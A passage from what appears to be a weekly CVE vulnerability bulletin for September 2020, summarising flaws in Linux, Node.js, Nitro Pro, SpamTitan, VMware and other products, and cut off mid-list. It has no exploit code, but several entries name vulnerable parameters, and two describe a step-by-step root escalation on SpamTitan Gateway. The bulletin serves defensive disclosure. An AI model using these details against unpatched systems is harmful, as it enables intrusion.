    A flaw was found in the Linux kernel before 5.9-rc4. A failure of the file system metadata validator in XFS can cause an inode with a valid, user-creatable extended attribute to be flagged as corrupt. This can lead to the filesystem being shutdown, or otherwise rendered inaccessible until it is remounted, leading to a denial of service. The highest threat from this vulnerability is to system availability. 2020-09-15 not yet calculated CVE-2020-14385
    CONFIRM
    MISC
    london_trust_media -- private_internet_access_vpn_client_for_linux
     
    A vulnerability in the Private Internet Access (PIA) VPN Client for Linux 1.5 through 2.3+ allows remote attackers to bypass an intended VPN kill switch mechanism and read sensitive information via intercepting network traffic. Since 1.5, PIA has supported a ?split tunnel? OpenVPN bypass option. The PIA killswitch & associated iptables firewall is designed to protect you while using the Internet. When the kill switch is configured to block all inbound and outbound network traffic, privileged applications can continue sending & receiving network traffic if net.ipv4.ip_forward has been enabled in the system kernel parameters. For example, a Docker container running on a host with the VPN turned off, and the kill switch turned on, can continue using the internet, leaking the host IP (CWE 200). In PIA 2.4.0+, policy-based routing is enabled by default and is used to direct all forwarded packets to the VPN interface automatically. 2020-09-14 not yet calculated CVE-2020-15590
    MISC
    MISC
    MISC
    mediawiki -- mediawiki
     
    The ScratchSig extension for MediaWiki before version 1.0.1 allows stored Cross-Site Scripting. Using <script> tag inside <scratchsig> tag, attackers with edit permission can execute scripts on visitors' browser. With MediaWiki JavaScript API, this can potentially lead to privilege escalation and/or account takeover. This has been patched in release 1.0.1. This has already been deployed to all Scratch Wikis. No workarounds exist other than disabling the extension completely. 2020-09-15 not yet calculated CVE-2020-15179
    MISC
    CONFIRM
    micro_focus -- operation_agent
     
    Unauthorized escalation of local privileges vulnerability on Micro Focus Operation Agent, affecting all versions prior to versions 12.11. The vulnerability could be exploited to escalate the local privileges and gain root access on the system. 2020-09-18 not yet calculated CVE-2020-11861
    MISC
    misp -- misp
     
    An issue was discovered in MISP before 2.4.132. It can perform an unwanted action because of a POST operation on a form that is not linked to the login page. 2020-09-18 not yet calculated CVE-2020-25766
    MISC
    MISC
    nextcloud -- desktop_client
     
    A cleartext storage of sensitive information in Nextcloud Desktop Client 2.6.4 gave away information about used proxies and their authentication credentials. 2020-09-18 not yet calculated CVE-2020-8225
    MISC
    MISC
    nifty -- project_management_web_application
     
    Nifty Project Management Web Application 2020-08-26 allows XSS, via Add Task, that is rendered upon a Project Home visit. 2020-09-15 not yet calculated CVE-2020-25071
    MISC
    MISC
    nitro_software -- nitro_pro
     
    An exploitable code execution vulnerability exists in the JPEG2000 Stripe Decoding functionality of Nitro Software, Inc.?s Nitro Pro 13.13.2.242 when decoding sub-samples. While initializing tiles with sub-sample data, the application can miscalculate a pointer for the stripes in the tile which allow for the decoder to write out of-bounds and cause memory corruption. This can result in code execution. A specially crafted image can be embedded inside a PDF and loaded by a victim in order to trigger this vulnerability. 2020-09-17 not yet calculated CVE-2020-6112
    MISC
    nitro_software -- nitro_pro
     
    An exploitable vulnerability exists in the object stream parsing functionality of Nitro Software, Inc.?s Nitro Pro 13.13.2.242 when updating its cross-reference table. When processing an object stream from a PDF document, the application will perform a calculation in order to allocate memory for the list of indirect objects. Due to an error when calculating this size, an integer overflow may occur which can result in an undersized buffer being allocated. Later when initializing this buffer, the application can write outside its bounds which can cause a memory corruption that can lead to code execution. A specially crafted document can be delivered to a victim in order to trigger this vulnerability. 2020-09-17 not yet calculated CVE-2020-6113
    MISC
    nitro_software -- nitro_pro
     
    An exploitable vulnerability exists in the cross-reference table repairing functionality of Nitro Software, Inc.?s Nitro Pro 13.13.2.242. While searching for an object identifier in a malformed document that is missing from the cross-reference table, the application will save a reference to the object?s cross-reference table entry inside a stack variable. If the referenced object identifier is not found, the application may resize the cross-reference table which can change the scope of its entry. Later when the application tries to reference cross-reference entry via the stack variable, the application will access memory belonging to the recently freed table causing a use-after-free condition. A specially crafted document can be delivered by an attacker and loaded by a victim in order to trigger this vulnerability. 2020-09-17 not yet calculated CVE-2020-6115
    MISC
    nitro_software -- nitro_pro
     
    An arbitrary code execution vulnerability exists in the rendering functionality of Nitro Software, Inc.?s Nitro Pro 13.13.2.242. When drawing the contents of a page using colors from an indexed colorspace, the application can miscalculate the size of a buffer when allocating space for its colors. When using this allocated buffer, the application can write outside its bounds and cause memory corruption which can lead to code execution. A specially crafted document must be loaded by a victim in order to trigger this vulnerability. 2020-09-17 not yet calculated CVE-2020-6116
    MISC
    node.js -- node.js
     
    Node.js < 14.11.0 is vulnerable to HTTP denial of service (DoS) attacks based on delayed requests submission which can make the server unable to accept new connections. 2020-09-18 not yet calculated CVE-2020-8251
    MISC
    MISC
    node.js -- node.js
     
    The implementation of realpath in libuv < 10.22.1, < 12.18.4, and < 14.9.0 used within Node.js incorrectly determined the buffer size which can result in a buffer overflow if the resolved path is longer than 256 bytes. 2020-09-18 not yet calculated CVE-2020-8252
    MISC
    MISC
    node.js -- node.js
     
    Node.js < 12.18.4 and < 14.11 can be exploited to perform HTTP desync attacks and deliver malicious payloads to unsuspecting users. The payloads can be crafted by an attacker to hijack user sessions, poison cookies, perform clickjacking, and a multitude of other attacks depending on the architecture of the underlying system. The attack was possible due to a bug in processing of carrier-return symbols in the HTTP header names. 2020-09-18 not yet calculated CVE-2020-8201
    MISC
    MISC
    nvidia -- geforce_now
     
    NVIDIA GeForce NOW, versions prior to 2.0.23 on Windows and macOS, contains a vulnerability in the desktop application software that includes sensitive information as part of a URL, which may lead to information disclosure. 2020-09-18 not yet calculated CVE-2020-5975
    CONFIRM
    nvidia -- geforce_now
     
    NVIDIA GeForce NOW, versions prior to 2.0.23 (Windows, macOS) and versions prior to 5.31 (Android, Shield TV), contains a vulnerability in the application software where the network test component transmits sensitive information insecurely, which may lead to information disclosure. 2020-09-18 not yet calculated CVE-2020-5976
    CONFIRM
    objective_systems -- objective_open_cbor
     
    A memory corruption vulnerability in Objective Open CBOR Run-time (oocborrt) in versions before 2020-08-12 could allow an attacker to execute code via crafted Concise Binary Object Representation (CBOR) input to the cbor2json decoder. An uncaught error while decoding CBOR Major Type 3 text strings leads to the use of an attacker-controllable uninitialized stack value. This can be used to modify memory, causing a crash or potentially exploitable heap corruption. 2020-09-17 not yet calculated CVE-2020-24753
    MISC
    MISC
    ozeki -- ng_sms_gateway
     
    An issue was discovered in Ozeki NG SMS Gateway through 4.17.6. The RSS To SMS module processes XML files in an unsafe manner. This opens the application to an XML External Entity attack that can be used to perform SSRF or read arbitrary local files. 2020-09-18 not yet calculated CVE-2020-14029
    MISC
    MISC
    ozeki -- ng_sms_gateway
     
    An issue was discovered in Ozeki NG SMS Gateway through 4.17.6. The ASP.net SMS module can be used to read and validate the source code of ASP files. By altering the path, it can be made to read any file on the Operating System, usually with NT AUTHORITY\SYSTEM privileges. 2020-09-18 not yet calculated CVE-2020-14021
    MISC
    MISC
    MISC
    perl -- perl
     
    An issue was discovered in the DBI module through 1.643 for Perl. DBD::File drivers can open files from folders other than those specifically passed via the f_dir attribute in the data source name (DSN). NOTE: this issue exists because of an incomplete fix for CVE-2014-10401. 2020-09-16 not yet calculated CVE-2014-10402
    MISC
    perl -- perl
     
    An untrusted pointer dereference flaw was found in Perl-DBI < 1.643. A local attacker who is able to manipulate calls to dbd_db_login6_sv() could cause memory corruption, affecting the service's availability. 2020-09-16 not yet calculated CVE-2020-14392
    SUSE
    MISC
    MISC
    UBUNTU
    perl -- perl
     
    A buffer overflow was found in perl-DBI < 1.643 in DBI.xs. A local attacker who is able to supply a string longer than 300 characters could cause an out-of-bounds write, affecting the availability of the service or integrity of data. 2020-09-16 not yet calculated CVE-2020-14393
    SUSE
    MISC
    MISC
    philips -- clinical_collaboration_platform
     
    Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output used as a webpage that is served to other users. 2020-09-18 not yet calculated CVE-2020-14525
    MISC
    philips -- clinical_collaboration_platform
     
    Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The software does not properly control the allocation and maintenance of a limited resource, thereby enabling an attacker to influence the amount of resources consumed, eventually leading to the exhaustion of available resources. 2020-09-18 not yet calculated CVE-2020-16200
    MISC
    philips -- clinical_collaboration_platform
     
    Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource. 2020-09-18 not yet calculated CVE-2020-16247
    MISC
    philips -- clinical_collaboration_platform
     
    Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. When an attacker claims to have a given identity, the software does not prove or insufficiently proves the claim is correct. 2020-09-18 not yet calculated CVE-2020-16198
    MISC
    philips -- clinical_collaboration_platfotm
     
    Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The product receives input or data, but it does not validate or incorrectly validates that the input has the properties required to process the data safely and correctly. 2020-09-18 not yet calculated CVE-2020-14506
    MISC
    postgresql -- postgreql
     
    The Windows installer for PostgreSQL 9.5 - 12 invokes system-provided executables that do not have fully-qualified paths. Executables in the directory where the installer loads or the current working directory take precedence over the intended executables. An attacker having permission to add files into one of those directories can use this to execute arbitrary code with the installer's administrative rights. 2020-09-16 not yet calculated CVE-2020-10733
    MISC
    MISC
    prestashop -- prestashop
     
    In PrestaShop contactform module (prestashop/contactform) before version 4.3.0, an attacker is able to inject JavaScript while using the contact form. The `message` field was incorrectly unescaped, possibly allowing attackers to execute arbitrary JavaScript in a victim's browser. 2020-09-15 not yet calculated CVE-2020-15178
    MISC
    CONFIRM
    MISC
    puppet -- puppet_enterprise
     
    Local registry credentials were included directly in the CD4PE deployment definition, which could expose these credentials to users who should not have access to them. This is resolved in Continuous Delivery for Puppet Enterprise 4.0.1. 2020-09-18 not yet calculated CVE-2020-7945
    MISC
    rad -- secflow-1v
     
    A vulnerability in the web-based management interface of RAD SecFlow-1v through 2020-05-21 could allow an authenticated attacker to upload a JavaScript file, with a stored XSS payload, that will remain stored in the system as an OVPN file in Configuration-Services-Security-OpenVPN-Config or as the static key file in Configuration-Services-Security-OpenVPN-Static Keys. This payload will execute each time a user opens an affected web page. This could be exploited in conjunction with CVE-2020-13259. 2020-09-17 not yet calculated CVE-2020-13260
    MISC
    MISC
    MISC
    rad -- secflow-1v
     
    A vulnerability in the web-based management interface of RAD SecFlow-1v os-image SF_0290_2.3.01.26 could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. The vulnerability is due to insufficient CSRF protections for the web UI on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. This could be exploited in conjunction with CVE-2020-13260. 2020-09-16 not yet calculated CVE-2020-13259
    MISC
    EXPLOIT-DB
    rapid7 -- appspider
     
    In AppSpider installer versions prior to 7.2.126, the AppSpider installer calls an executable which can be placed in the appropriate directory by an attacker with access to the local machine. This would prevent the installer from distinguishing between a valid executable called during an installation and any arbitrary code executable using the same file name. 2020-09-18 not yet calculated CVE-2020-7358
    MISC
    red_discord_bot -- act_module
     
    The Act module for Red Discord Bot before commit 6b9f3b86 is vulnerable to Remote Code Execution. With this exploit, Discord users can use specially crafted messages to perform destructive actions and/or access sensitive information. Unloading the Act module with `unload act` can render this exploit inaccessible. 2020-09-15 not yet calculated CVE-2020-15172
    MISC
    CONFIRM
    red_hat -- jboss_eap
     
    The issue appears to be that JBoss EAP 6.4.21 does not parse the field-name in accordance to RFC7230[1] as it returns a 200 instead of a 400. 2020-09-16 not yet calculated CVE-2020-1710
    MISC
    red_hat -- jboss_keycloak A flaw was found in all versions of Keycloak before 10.0.0, where the NodeJS adapter did not support the verify-token-audience. This flaw results in some users having access to sensitive information outside of their permissions. 2020-09-16 not yet calculated CVE-2020-1694
    MISC
    red_hat -- jboss_keycloak
     
    A vulnerability was found in Keycloak before 11.0.1 where DoS attack is possible by sending twenty requests simultaneously to the specified keycloak server, all with a Content-Length header value that exceeds the actual byte count of the request body. 2020-09-16 not yet calculated CVE-2020-10758
    MISC
    red_hat -- jboss_keycloak
     
    A flaw was found in Keycloak's data filter, in version 10.0.1, where it allowed the processing of data URLs in some circumstances. This flaw allows an attacker to conduct cross-site scripting or further attacks. 2020-09-16 not yet calculated CVE-2020-10748
    MISC
    red_hat -- openshift_console
     
    A content spoofing vulnerability was found in the openshift/console 3.11 and 4.x. This flaw allows an attacker to craft a URL and inject arbitrary text onto the error page that appears to be from the OpenShift instance. This attack could potentially convince a user that the inserted text is legitimate. 2020-09-16 not yet calculated CVE-2020-10715
    MISC
    MISC
    red_hat -- qt_library
     
    Uncontrolled search path in the QT Library before 5.14.0, 5.12.7 and 5.9.10 may allow an authenticated user to potentially enable elevation of privilege via local access. 2020-09-14 not yet calculated CVE-2020-0570
    MISC
    resteasy -- resteasy
     
    A flaw was found in RESTEasy client in all versions of RESTEasy up to 4.5.6.Final. It may allow client users to obtain the server's potentially sensitive information when the server got WebApplicationException from the RESTEasy client call. The highest threat from this vulnerability is to data confidentiality. 2020-09-18 not yet calculated CVE-2020-25633
    CONFIRM
    rust -- rust
     
    An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, clone can have a memory-safety issue upon a panic. 2020-09-19 not yet calculated CVE-2020-25794
    MISC
    MISC
    rust -- rust
     
    An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the InlineArray implementation, an unaligned reference may be generated for a type that has a large alignment requirement. 2020-09-19 not yet calculated CVE-2020-25796
    MISC
    MISC
    rust -- rust
     
    An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, insert_from can have a memory-safety issue upon a panic. 2020-09-19 not yet calculated CVE-2020-25795
    MISC
    MISC
    rust -- rust
     
    An issue was discovered in the linked-hash-map crate before 0.5.3 for Rust. It creates an uninitialized NonNull pointer, which violates a non-null constraint. 2020-09-14 not yet calculated CVE-2020-25573
    MISC
    MISC
    rust -- rust
     
    An issue was discovered in the rand_core crate before 0.4.2 for Rust. Casting of byte slices to integer slices mishandles alignment constraints. 2020-09-14 not yet calculated CVE-2020-25576
    MISC
    rust -- rust
     
    An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, the array size is not checked when constructed with unit(). 2020-09-19 not yet calculated CVE-2020-25791
    MISC
    MISC
    rust -- rust
     
    An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, the array size is not checked when constructed with pair(). 2020-09-19 not yet calculated CVE-2020-25792
    MISC
    MISC
    rust -- rust
     
    An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, the array size is not checked when constructed with From<InlineArray<A, T>>. 2020-09-19 not yet calculated CVE-2020-25793
    MISC
    MISC
    rust -- rust
     
    ** UNSUPPORTED WHEN ASSIGNED ** An issue was discovered in the failure crate through 0.1.5 for Rust. It has a type confusion flaw when downcasting. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. 2020-09-14 not yet calculated CVE-2020-25575
    MISC
    MISC
    rust -- rust
     
    An issue was discovered in the http crate before 0.1.20 for Rust. An integer overflow in HeaderMap::reserve() could result in denial of service (e.g., an infinite loop). 2020-09-14 not yet calculated CVE-2020-25574
    MISC
    MISC
    safervpn_for_windows -- safervpn_for_windows
     
    SaferVPN before 5.0.3.3 on Windows could allow low-privileged users to create or overwrite arbitrary files, which could cause a denial of service (DoS) condition, because a symlink from %LOCALAPPDATA%\SaferVPN\Log is followed. 2020-09-18 not yet calculated CVE-2020-25744
    MISC
    MISC
    schneider_electric -- scadapack_7x_remote_connect
     
    A CWE-502 Deserialization of Untrusted Data vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which could allow arbitrary code execution when an attacker builds a custom .PRJ file containing a malicious serialized buffer. 2020-09-16 not yet calculated CVE-2020-7528
    MISC
    schneider_electric -- scadapack_7x_remote_connect
     
    A CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Transversal') vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows an attacker to place content in any unprotected folder on the target system using a crafted .RCZ file. 2020-09-16 not yet calculated CVE-2020-7529
    MISC
    schneider_electric -- scadapack_7x_remote_connect
     
    A CWE-285 Improper Authorization vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows improper access to executable code folders. 2020-09-16 not yet calculated CVE-2020-7530
    MISC
    schneider_electric -- scadapack_7x_remote_connect
     
    A CWE-284 Improper Access Control vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows an attacker to place executables in a specific folder and run code whenever RemoteConnect is executed by the user. 2020-09-16 not yet calculated CVE-2020-7531
    MISC
    schnieder_electric -- scadapack_7x_security_administrator
     
    A CWE-502 Deserialization of Untrusted Data vulnerability exists in SCADAPack x70 Security Administrator (V1.2.0 and prior) which could allow arbitrary code execution when an attacker builds a custom .SDB file containing a malicious serialized buffer. 2020-09-16 not yet calculated CVE-2020-7532
    MISC
    solarwinds -- orion_platform
     
    Stored XSS (Cross-Site Scripting) exists in the SolarWinds Orion Platform before before 2020.2.1 on multiple forms and pages. This vulnerability may lead to the Information Disclosure and Escalation of Privileges (takeover of administrator account). 2020-09-17 not yet calculated CVE-2020-13169
    CONFIRM
    MISC
    sourcecodester -- online_course_registartion
     
    A File Upload vulnerability in SourceCodester Online Course Registration v1.0 allows remote attackers to achieve Remote Code Execution (RCE) on the hosting webserver by uploading a crafted PHP web-shell that bypasses the image upload filters. An attack uses /Online%20Course%20Registration/my-profile.php with the POST parameter photo. 2020-09-15 not yet calculated CVE-2020-23828
    MISC
    MISC
    soycms -- soycms SoyCMS 3.0.2 and earlier is affected by Reflected Cross-Site Scripting (XSS) which leads to Remote Code Execution (RCE) from a known vulnerability. This allows remote attackers to force the administrator to edit files once the adminsitrator loads a specially crafted webpage. 2020-09-17 not yet calculated CVE-2020-15183
    MISC
    CONFIRM
    MISC
    soycms -- soycms SOY CMS 3.0.2 and earlier is affected by Remote Code Execution (RCE) using Unrestricted File Upload. Cross-Site Scripting(XSS) vulnerability that was used in CVE-2020-15183 can be used to increase impact by redirecting the administrator to access a specially crafted page. This vulnerability is caused by insecure configuration in elFinder. This is fixed in version 3.0.2.328. 2020-09-18 not yet calculated CVE-2020-15189
    MISC
    MISC
    MISC
    CONFIRM
    MISC
    soycms -- soycms SOY CMS 3.0.2.327 and earlier is affected by Unauthenticated Remote Code Execution (RCE). The allows remote attackers to execute any arbitrary code when the inquiry form feature is enabled by the service. The vulnerability is caused by unserializing the form without any restrictions. This was fixed in 3.0.2.328. 2020-09-18 not yet calculated CVE-2020-15188
    MISC
    MISC
    CONFIRM
    MISC
    soycms -- soycms The SOY Inquiry component of SOY CMS is affected by Cross-site Request Forgery (CSRF) and Remote Code Execution (RCE). The vulnerability affects versions 2.0.0.3 and earlier of SOY Inquiry. This allows remote attackers to force the administrator to edit files once the administrator loads a specially crafted webpage. An administrator must be logged in for exploitation to be possible. This issue is fixed in SOY Inquiry version 2.0.0.4 and included in SOY CMS 3.0.2.328. 2020-09-17 not yet calculated CVE-2020-15182
    MISC
    CONFIRM
    MISC
    spring -- spring_framework
     
    In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter. 2020-09-19 not yet calculated CVE-2020-5421
    CONFIRM
    sqreen -- php_agent_daemon
     
    Lack of cryptographic signature verification in the Sqreen PHP agent daemon before 1.16.0 makes it easier for remote attackers to inject rules for execution inside the virtual machine. 2020-09-17 not yet calculated CVE-2020-25490
    CONFIRM
    sqreen -- pyminiracer
     
    A heap overflow in Sqreen PyMiniRacer (aka Python Mini Racer) before 0.3.0 allows remote attackers to potentially exploit heap corruption. 2020-09-17 not yet calculated CVE-2020-25489
    CONFIRM
    MISC
    suse -- multiple_products
     
    A Improper Access Control vulnerability in the configuration of salt of SUSE Linux Enterprise Module for SUSE Manager Server 4.1, SUSE Manager Proxy 4.0, SUSE Manager Retail Branch Server 4.0, SUSE Manager Server 3.2, SUSE Manager Server 4.0 allows local users to escalate to root on every system managed by SUSE manager. On the managing node itself code can be executed as user salt, potentially allowing for escalation to root there. This issue affects: SUSE Linux Enterprise Module for SUSE Manager Server 4.1 google-gson versions prior to 2.8.5-3.4.3, httpcomponents-client-4.5.6-3.4.2, httpcomponents-. SUSE Manager Proxy 4.0 release-notes-susemanager-proxy versions prior to 4.0.9-0.16.38.1. SUSE Manager Retail Branch Server 4.0 release-notes-susemanager-proxy versions prior to 4.0.9-0.16.38.1. SUSE Manager Server 3.2 salt-netapi-client versions prior to 0.16.0-4.14.1, spacewalk-. SUSE Manager Server 4.0 release-notes-susemanager versions prior to 4.0.9-3.54.1. 2020-09-17 not yet calculated CVE-2020-8028
    CONFIRM
    sylabs -- singularity
     
    Sylabs Singularity through 3.6.2 has Insecure Permissions on temporary directories used in explicit and implicit container build operations, a different vulnerability than CVE-2020-25039. 2020-09-16 not yet calculated CVE-2020-25040
    MISC
    MISC
    sylabs -- singularity
     
    Sylabs Singularity 3.2.0 through 3.6.2 has Insecure Permissions on temporary directories used in fakeroot or user namespace container execution. 2020-09-16 not yet calculated CVE-2020-25039
    MISC
    MISC
    tibco_software -- multiple_products
     
    The Spotfire client component of TIBCO Software Inc.'s TIBCO Spotfire Analyst, TIBCO Spotfire Analytics Platform for AWS Marketplace, TIBCO Spotfire Desktop, and TIBCO Spotfire Server contains a vulnerability that theoretically allows a legitimate user to inject scripts. If executed by a victim authenticated to the affected system these scripts will be executed at the privileges of the victim. Affected releases are TIBCO Software Inc.'s TIBCO Spotfire Analyst: versions 10.7.0, 10.8.0, 10.9.0, and 10.10.0, TIBCO Spotfire Analytics Platform for AWS Marketplace: versions 10.7.0, 10.8.0, 10.8.1, 10.9.0, 10.10.0, and 10.10.1, TIBCO Spotfire Desktop: versions 10.7.0, 10.8.0, 10.9.0, and 10.10.0, and TIBCO Spotfire Server: versions 10.7.0, 10.8.0, 10.8.1, 10.9.0, 10.10.0, and 10.10.1. 2020-09-15 not yet calculated CVE-2020-9416
    CONFIRM
    CONFIRM
    tiny -- tiny_rss
     
    An issue was discovered in Tiny Tiny RSS (aka tt-rss) before 2020-09-16. imgproxy in plugins/af_proxy_http/init.php mishandles $_REQUEST["url"] in an error message. 2020-09-19 not yet calculated CVE-2020-25788
    MISC
    MISC
    tiny -- tiny_rss
     
    An issue was discovered in Tiny Tiny RSS (aka tt-rss) before 2020-09-16. It does not validate all URLs before requesting them. 2020-09-19 not yet calculated CVE-2020-25787
    MISC
    MISC
    tiny -- tiny_rss
     
    An issue was discovered in Tiny Tiny RSS (aka tt-rss) before 2020-09-16. The cached_url feature mishandles JavaScript inside an SVG document. 2020-09-19 not yet calculated CVE-2020-25789
    MISC
    MISC
    titanhq -- spamtitan An issue was discovered in Titan SpamTitan 7.07. Improper sanitization of the parameter jaction when interacting with the page mailqueue.php could lead to PHP code evaluation server-side, because the user-provided input is passed directly to the php eval() function. The user has to be authenticated on the web platform before interacting with the page. 2020-09-17 not yet calculated CVE-2020-11803
    MISC
    MISC
    MISC
    MISC
    MISC
    titanhq -- spamtitan
     
    An issue was discovered in Titan SpamTitan 7.07. Due to improper sanitization of the parameter quid, used in the page mailqueue.php, code injection can occur. The input for this parameter is provided directly by an authenticated user via an HTTP GET request. 2020-09-17 not yet calculated CVE-2020-11804
    MISC
    MISC
    MISC
    MISC
    MISC
    titanhq -- spamtitan
     
    An issue was discovered in Titan SpamTitan 7.07. Improper validation of the parameter fname on the page certs-x.php would allow an attacker to execute remote code on the target server. The user has to be authenticated before interacting with this page. 2020-09-17 not yet calculated CVE-2020-11699
    MISC
    MISC
    MISC
    MISC
    MISC
    titanhq -- spamtitan
     
    An issue was discovered in Titan SpamTitan 7.07. Improper sanitization of the parameter fname, used on the page certs-x.php, would allow an attacker to retrieve the contents of arbitrary files. The user has to be authenticated before interacting with this page. 2020-09-17 not yet calculated CVE-2020-11700
    MISC
    MISC
    MISC
    MISC
    MISC
    titanhq -- spamtitan
     
    An issue was discovered in Titan SpamTitan 7.07. Improper input sanitization of the parameter community on the page snmp-x.php would allow a remote attacker to inject commands into the file snmpd.conf that would allow executing commands on the target server. 2020-09-17 not yet calculated CVE-2020-11698
    MISC
    MISC
    MISC
    MISC
    titanhq -- spantitan_gateway
     
    A sandbox escape issue was discovered in TitanHQ SpamTitan Gateway 7.07. It limits the admin user to a restricted shell, allowing execution of a small number of tools of the operating system. This restricted shell can be bypassed after changing the properties of the user admin in the operating system file /etc/passwd. This file cannot be accessed though the restricted shell, but it can be modified by abusing the Backup/Import Backup functionality of the web interface. An authenticated attacker would be able to obtain the file /var/tmp/admin.passwd after executing a Backup operation. This file can be manually modified to change the GUID of the user to 0 (root) and change the restricted shell to a normal shell /bin/sh. After the modification is done, the file can be recompressed to a .tar.bz file and imported again via the Import Backup functionality. The properties of the admin user will be overwritten and a root shell will be granted to the user upon the next successful login. 2020-09-17 not yet calculated CVE-2020-24046
    MISC
    MISC
    MISC
    MISC
    titanhq -- spantitan_gateway
     
    A sandbox escape issue was discovered in TitanHQ SpamTitan Gateway 7.07. It limits the admin user to a restricted shell, allowing execution of a small number of tools of the operating system. The restricted shell can be bypassed by presenting a fake vmware-tools ISO image to the guest virtual machine running SpamTitan Gateway. This ISO image should contain a valid Perl script at the vmware-freebsd-tools/vmware-tools-distrib/vmware-install.pl path. The fake ISO image will be mounted and the script wmware-install.pl will be executed with super-user privileges as soon as the hidden option to install VMware Tools is selected in the main menu of the restricted shell (option number 5). The contents of the script can be whatever the attacker wants, including a backdoor or similar. 2020-09-17 not yet calculated CVE-2020-24045
    MISC
    MISC
    MISC
    MISC
    trend_micro -- serverprotect
     
    A command injection vulnerability in Trend Micro ServerProtect for Linux 3.0 could allow an attacker to execute arbitrary code on an affected system. An attacker must first obtain admin/root privileges on the SPLX console to exploit this vulnerability. 2020-09-15 not yet calculated CVE-2020-24561
    N/A
    typeorm -- typeorm
     
    Prototype pollution vulnerability in the TypeORM package < 0.2.25 may allow attackers to add or modify Object properties leading to further denial of service or SQL injection attacks. 2020-09-18 not yet calculated CVE-2020-8158
    MISC
    ua-parser-js -- ua-parser-js
     
    The package ua-parser-js before 0.7.22 are vulnerable to Regular Expression Denial of Service (ReDoS) via the regex for Redmi Phones and Mi Pad Tablets UA. 2020-09-16 not yet calculated CVE-2020-7733
    CONFIRM
    CONFIRM
    CONFIRM
    CONFIRM
    vmware -- fusion
     
    VMware Fusion (11.x) contains a privilege escalation vulnerability due to the way it allows configuring the system wide path. An attacker with normal user privileges may exploit this issue to trick an admin user into executing malicious code on the system where Fusion is installed. 2020-09-16 not yet calculated CVE-2020-3980
    MISC
    vmware -- workstation
     
    VMware Workstation (15.x) and Horizon Client for Windows (5.x before 5.4.4) contain an out-of-bounds read vulnerability in Cortado ThinPrint component (EMF Parser). A malicious actor with normal access to a virtual machine may be able to exploit these issues to create a partial denial-of-service condition or to leak memory from TPView process running on the system where Workstation or Horizon Client for Windows is installed. 2020-09-16 not yet calculated CVE-2020-3986
    MISC
    vmware -- workstation_and_horizon_client
     
    VMware Workstation (15.x) and Horizon Client for Windows (5.x before 5.4.4) contain a denial of service vulnerability due to an out-of-bounds write issue in Cortado ThinPrint component. A malicious actor with normal access to a virtual machine may be able to exploit this issue to create a partial denial-of-service condition on the system where Workstation or Horizon Client for Windows is installed. Exploitation is only possible if virtual printing has been enabled. This feature is not enabled by default on Workstation but it is enabled by default on Horizon Client. 2020-09-16 not yet calculated CVE-2020-3989
    MISC
    vmware -- workstation_and_horizon_client
     
    VMware Workstation (15.x) and Horizon Client for Windows (5.x before 5.4.4) contain an out-of-bounds read vulnerability in Cortado ThinPrint component (EMR STRETCHDIBITS parser). A malicious actor with normal access to a virtual machine may be able to exploit these issues to create a partial denial-of-service condition or to leak memory from TPView process running on the system where Workstation or Horizon Client for Windows is installed. 2020-09-16 not yet calculated CVE-2020-3987
    MISC
    vmware -- workstation_and_horizon_client
     
    VMware Workstation (15.x) and Horizon Client for Windows (5.x before 5.4.4) contain an information disclosure vulnerability due to an integer overflow issue in Cortado ThinPrint component. A malicious actor with normal access to a virtual machine may be able to exploit this issue to leak memory from TPView process running on the system where Workstation or Horizon Client for Windows is installed. Exploitation is only possible if virtual printing has been enabled. This feature is not enabled by default on Workstation but it is enabled by default on Horizon Client. 2020-09-16 not yet calculated CVE-2020-3990
    MISC
    vmware -- workstation_and_horizon_client
     
    VMware Workstation (15.x) and Horizon Client for Windows (5.x before 5.4.4) contain an out-of-bounds read vulnerability in Cortado ThinPrint component (JPEG2000 parser). A malicious actor with normal access to a virtual machine may be able to exploit these issues to create a partial denial-of-service condition or to leak memory from TPView process running on the system where Workstation or Horizon Client for Windows is installed. 2020-09-16 not yet calculated CVE-2020-3988
    MISC
    vr_cam -- p1_camera
     
    VR CAM P1 Model P1 v1 has an incorrect access control vulnerability where an attacker can obtain complete access of the device from web (remote) without authentication. 2020-09-15 not yet calculated CVE-2020-23512
    MISC
    webtareas -- webtareas
     
    webTareas through 2.1 allows upload of the dangerous .exe and .shtml file types. 2020-09-18 not yet calculated CVE-2020-25733
    MISC
    MISC
    MISC
    webtareas -- webtareas
     
    webTareas through 2.1 allows files/Default/ Directory Listing. 2020-09-18 not yet calculated CVE-2020-25734
    MISC
    MISC
    MISC
    webtareas -- webtareas
     
    webTareas through 2.1 allows XSS in clients/editclient.php, extensions/addextension.php, administration/add_announcement.php, administration/departments.php, administration/locations.php, expenses/claim_type.php, projects/editproject.php, and general/newnotifications.php. 2020-09-18 not yet calculated CVE-2020-25735
    MISC
    MISC
    MISC
    wibu-systems -- codemeter
     
